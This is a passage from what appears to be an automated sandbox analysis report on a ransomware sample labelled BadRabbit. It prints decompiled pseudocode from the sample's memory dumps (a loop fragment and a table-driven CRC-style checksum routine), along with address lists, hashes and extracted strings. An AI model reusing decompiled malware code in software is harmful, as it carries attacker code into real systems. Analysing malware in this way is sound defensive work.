                                                                                                                                                                                        						_t170 = _t171 >> 0x10;
                                                                                                                                                                                        						asm("stosb");
                                                                                                                                                                                        						goto L64;
                                                                                                                                                                                        						L65:
                                                                                                                                                                                        					} while (_t426[5] > _t390);
                                                                                                                                                                                        					goto L104;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}




























































































                                                                                                                                                                                        0x01323a2f
                                                                                                                                                                                        0x01323a34
                                                                                                                                                                                        0x01323a36
                                                                                                                                                                                        0x01323a38
                                                                                                                                                                                        0x01323a3c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323af6
                                                                                                                                                                                        0x01323dde
                                                                                                                                                                                        0x01323dde
                                                                                                                                                                                        0x01323de3
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323de3
                                                                                                                                                                                        0x01323b0c
                                                                                                                                                                                        0x01323b0c
                                                                                                                                                                                        0x01323a42
                                                                                                                                                                                        0x01323a45
                                                                                                                                                                                        0x01323aaf
                                                                                                                                                                                        0x01323a6e
                                                                                                                                                                                        0x01323a6e
                                                                                                                                                                                        0x01323a74
                                                                                                                                                                                        0x01323a7a
                                                                                                                                                                                        0x01323b16
                                                                                                                                                                                        0x01323b1a
                                                                                                                                                                                        0x01323b1c
                                                                                                                                                                                        0x01323b22
                                                                                                                                                                                        0x01323e06
                                                                                                                                                                                        0x01323e06
                                                                                                                                                                                        0x01323e0a
                                                                                                                                                                                        0x01323e0f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323e0f
                                                                                                                                                                                        0x01323b28
                                                                                                                                                                                        0x01323b2f
                                                                                                                                                                                        0x01323b55
                                                                                                                                                                                        0x01323b5b
                                                                                                                                                                                        0x01323b8b
                                                                                                                                                                                        0x01323b8d
                                                                                                                                                                                        0x01323b93
                                                                                                                                                                                        0x01323b97
                                                                                                                                                                                        0x01323b97
                                                                                                                                                                                        0x01323b97
                                                                                                                                                                                        0x01323b9b
                                                                                                                                                                                        0x01323b9b
                                                                                                                                                                                        0x01323b5d
                                                                                                                                                                                        0x01323b63
                                                                                                                                                                                        0x01323b65
                                                                                                                                                                                        0x01323b67
                                                                                                                                                                                        0x01323b6d
                                                                                                                                                                                        0x01323b71
                                                                                                                                                                                        0x01323b71
                                                                                                                                                                                        0x01323b71
                                                                                                                                                                                        0x01323b73
                                                                                                                                                                                        0x01323b77
                                                                                                                                                                                        0x01323b7d
                                                                                                                                                                                        0x01323b81
                                                                                                                                                                                        0x01323b81
                                                                                                                                                                                        0x01323b81
                                                                                                                                                                                        0x01323b85
                                                                                                                                                                                        0x01323b85
                                                                                                                                                                                        0x01323b7d
                                                                                                                                                                                        0x01323b6d
                                                                                                                                                                                        0x01323b31
                                                                                                                                                                                        0x01323b33
                                                                                                                                                                                        0x01323b35
                                                                                                                                                                                        0x01323b3b
                                                                                                                                                                                        0x01323b3f
                                                                                                                                                                                        0x01323b3f
                                                                                                                                                                                        0x01323b3f
                                                                                                                                                                                        0x01323b43
                                                                                                                                                                                        0x01323b43
                                                                                                                                                                                        0x01323b3b
                                                                                                                                                                                        0x01323b9d
                                                                                                                                                                                        0x01323b9f
                                                                                                                                                                                        0x01323b9f
                                                                                                                                                                                        0x01323b9f
                                                                                                                                                                                        0x01323ba1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323ba1
                                                                                                                                                                                        0x01323a86
                                                                                                                                                                                        0x01323a88
                                                                                                                                                                                        0x01323a8d
                                                                                                                                                                                        0x01323a95
                                                                                                                                                                                        0x01323a98
                                                                                                                                                                                        0x01323a9b
                                                                                                                                                                                        0x01323aa1
                                                                                                                                                                                        0x01323aa1
                                                                                                                                                                                        0x01323aa1
                                                                                                                                                                                        0x01323aa3
                                                                                                                                                                                        0x01323ab7
                                                                                                                                                                                        0x01323ab7
                                                                                                                                                                                        0x01323abc
                                                                                                                                                                                        0x01323abe
                                                                                                                                                                                        0x01323ac1
                                                                                                                                                                                        0x01323ac4
                                                                                                                                                                                        0x01323ac7
                                                                                                                                                                                        0x01323aca
                                                                                                                                                                                        0x01323acd
                                                                                                                                                                                        0x01323acd
                                                                                                                                                                                        0x01323acd
                                                                                                                                                                                        0x01323acd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323aaf
                                                                                                                                                                                        0x01323a49
                                                                                                                                                                                        0x01323a4f
                                                                                                                                                                                        0x01323a51
                                                                                                                                                                                        0x01323a53
                                                                                                                                                                                        0x01323a58
                                                                                                                                                                                        0x01323a5a
                                                                                                                                                                                        0x01323a5a
                                                                                                                                                                                        0x01323a64
                                                                                                                                                                                        0x01323a66
                                                                                                                                                                                        0x01323a68
                                                                                                                                                                                        0x01323a6a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323a6a
                                                                                                                                                                                        0x013239bc
                                                                                                                                                                                        0x013239bc
                                                                                                                                                                                        0x01323e28
                                                                                                                                                                                        0x01323e2f
                                                                                                                                                                                        0x01323e31
                                                                                                                                                                                        0x01323e31
                                                                                                                                                                                        0x01323e33
                                                                                                                                                                                        0x01323e39
                                                                                                                                                                                        0x01323e3c
                                                                                                                                                                                        0x01323e3f
                                                                                                                                                                                        0x01323e44
                                                                                                                                                                                        0x01323e46
                                                                                                                                                                                        0x01323e49
                                                                                                                                                                                        0x01323e4c
                                                                                                                                                                                        0x01323e4e
                                                                                                                                                                                        0x01323e56
                                                                                                                                                                                        0x01323e5a
                                                                                                                                                                                        0x01323e5c
                                                                                                                                                                                        0x01323e60
                                                                                                                                                                                        0x01323e68
                                                                                                                                                                                        0x01323e68
                                                                                                                                                                                        0x01323e6c
                                                                                                                                                                                        0x01323e75
                                                                                                                                                                                        0x01323e7d
                                                                                                                                                                                        0x01323e7f
                                                                                                                                                                                        0x01323e82
                                                                                                                                                                                        0x01323e85
                                                                                                                                                                                        0x01323dd5
                                                                                                                                                                                        0x01323cab
                                                                                                                                                                                        0x01323cad
                                                                                                                                                                                        0x01323cb2
                                                                                                                                                                                        0x01323cba
                                                                                                                                                                                        0x01323cbd
                                                                                                                                                                                        0x01323cc0
                                                                                                                                                                                        0x01323cc6
                                                                                                                                                                                        0x01323cc6
                                                                                                                                                                                        0x01323cc6
                                                                                                                                                                                        0x01323cc8
                                                                                                                                                                                        0x01323ccc
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323ce3
                                                                                                                                                                                        0x01323ce3
                                                                                                                                                                                        0x01323ce6
                                                                                                                                                                                        0x01323ce8
                                                                                                                                                                                        0x01323ceb
                                                                                                                                                                                        0x01323cee
                                                                                                                                                                                        0x01323cf1
                                                                                                                                                                                        0x01323cf4
                                                                                                                                                                                        0x01323cf7
                                                                                                                                                                                        0x01323cf7
                                                                                                                                                                                        0x01323cf7
                                                                                                                                                                                        0x01323cf9
                                                                                                                                                                                        0x01323c02
                                                                                                                                                                                        0x01323c06
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323c06
                                                                                                                                                                                        0x01323cdb
                                                                                                                                                                                        0x01323c81
                                                                                                                                                                                        0x01323c84
                                                                                                                                                                                        0x01323c87
                                                                                                                                                                                        0x01323c8a
                                                                                                                                                                                        0x01323c93
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323c93
                                                                                                                                                                                        0x01323bfe
                                                                                                                                                                                        0x01323c01
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323c0c
                                                                                                                                                                                        0x01323c0c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x01323c12

Strings
Memory Dump Source
• Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
• Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
Similarity
• API ID:
• String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
• API String ID: 0-3089872807
• Opcode ID: ef1b29ac451cc89592a30b91f895f5550eae652ce20b06b05084a420e4af0452
• Instruction ID: e314004035101c4b82e118391a869eb2c70b0421c8fef076d82d24e975d1699d
• Opcode Fuzzy Hash: ef1b29ac451cc89592a30b91f895f5550eae652ce20b06b05084a420e4af0452
• Instruction Fuzzy Hash: B1121A32A083658FD715EE3CC58466ABBE1BB8C318F04862DE895D7B41D379DD49C781
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                                                        			E013230E3(signed int _a4, signed char _a8, unsigned int _a12) {
                                                                                                                                                                                        				signed int _t161;
                                                                                                                                                                                        				signed char _t164;
                                                                                                                                                                                        				signed char _t189;
                                                                                                                                                                                        				signed int _t222;
                                                                                                                                                                                        				unsigned int _t224;
                                                                                                                                                                                        				unsigned int _t248;
                                                                                                                                                                                        				signed char* _t249;
                                                                                                                                                                                        				signed int* _t250;
                                                                                                                                                                                        				signed int _t251;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t189 = _a8;
                                                                                                                                                                                        				_t222 = 0xff;
                                                                                                                                                                                        				_t248 = _a12;
                                                                                                                                                                                        				_t161 =  !_a4;
                                                                                                                                                                                        				_t251 = _t248;
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_a8 = _t189;
                                                                                                                                                                                        					if(_t251 == 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t251 = _t189 & 0x00000003;
                                                                                                                                                                                        					if(_t251 != 0) {
                                                                                                                                                                                        						_t161 = _t161 >> 0x00000008 ^  *(0x1324b18 + (( *_t189 & 0x000000ff ^ _t161) & _t222) * 4);
                                                                                                                                                                                        						_t189 = _t189 + 1;
                                                                                                                                                                                        						_t248 = _t248 - 1;
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					break;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t248 < 0x20) {
                                                                                                                                                                                        					_t249 = _a8;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_a4 = _t248 >> 5;
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						_t165 = _t161 ^  *_t189;
                                                                                                                                                                                        						_a8 = _t189 + 4;
                                                                                                                                                                                        						_t250 = _a8;
                                                                                                                                                                                        						_t241 =  *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + 
((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( 
*(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  
*(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t177 >> 0x18) * 4) ^  *(0x1325718 + (_t177 & 0x000000ff) * 4) ^ _t250[4];
                                                                                                                                                                                        						_t248 = _t248 - 0x20;
                                                                                                                                                                                        						_t247 =  *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) 
^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  
*(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  
